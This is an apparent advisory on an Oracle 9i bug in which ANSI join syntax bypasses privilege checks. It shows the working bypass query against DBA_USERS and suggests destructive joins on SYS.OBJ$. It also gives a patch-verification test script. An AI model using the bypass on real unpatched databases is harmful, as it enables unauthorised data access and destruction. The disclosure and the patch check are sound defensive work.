Security Hole


This one has been done to death on the newsgroup, but just in case you haven't seen it, there is a security hole in 9i when using the new ANSI join syntax. Consider the following example:

create user demo identified by demo;
grant create session to demo;

connect demo/demo

Now at this point, the DEMO user should only be able to query those tables accessible to PUBLIC. For example,

SQL> select * from dba_users;

select * from dba_users
              *
ERROR at line 1:
ORA-00942: table or view does not exist

But as soon as you add in the newly supported ANSI join syntax, privileges appear to be bypassed.

select a.*
from   dba_users a
cross join dual;

(all rows appear)

Of more concern is that (unrelated to this bug) some joins of course allow updates, deletes and so on, so a carefully constructed join using the new syntax can be used to destroy all sorts of things. (A cross join to SYS.OBJ$ would be the obvious candidate to do maximum damage.)

This is listed as bug 2121935, which is fixed in 9i.2; a patch (of the same number) is also available for some platforms on 9.0.1.3.
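
To confirm that a given instance has the fix, the two queries above can be run as a pass/fail check from a throwaway account that holds only CREATE SESSION. This SQL*Plus script is an added example, not part of the original note; the user name ANSI_CHECK, its password and the PROBE helper are made up for illustration, and it assumes the dynamic SQL is privilege-checked the same way as the interactive statements shown above.

```sql
-- Run from SQL*Plus, starting as a DBA on a test instance.
-- ANSI_CHECK and its password are constructed names for this example.
create user ansi_check identified by ansi_check_pw;
grant create session to ansi_check;

connect ansi_check/ansi_check_pw
set serveroutput on

declare
  n number;

  -- Hypothetical helper: run one statement as the unprivileged user and
  -- report whether the expected ORA-00942 was raised.
  procedure probe(label in varchar2, stmt in varchar2) is
  begin
    execute immediate stmt into n;
    -- Reaching this line means the privilege check did not stop the query.
    dbms_output.put_line('FAIL ' || label || ': ' || n || ' rows visible');
  exception
    when others then
      if sqlcode = -942 then
        dbms_output.put_line('OK   ' || label || ': ORA-00942 as expected');
      else
        -- Any other error is reported as-is, not counted as pass or fail.
        dbms_output.put_line('?    ' || label || ': ' || sqlerrm);
      end if;
  end probe;
begin
  -- Baseline: the traditional syntax must be refused.
  probe('plain select', 'select count(*) from dba_users');
  -- The ANSI form from the note above must be refused in the same way.
  probe('ANSI cross join',
        'select count(*) from dba_users a cross join dual');
end;
/

-- Clean up: reconnect as a DBA and remove the test account.
connect / as sysdba
drop user ansi_check cascade;
```

On a patched instance both lines report OK. A FAIL on the second line only means the ANSI join is still bypassing the privilege check.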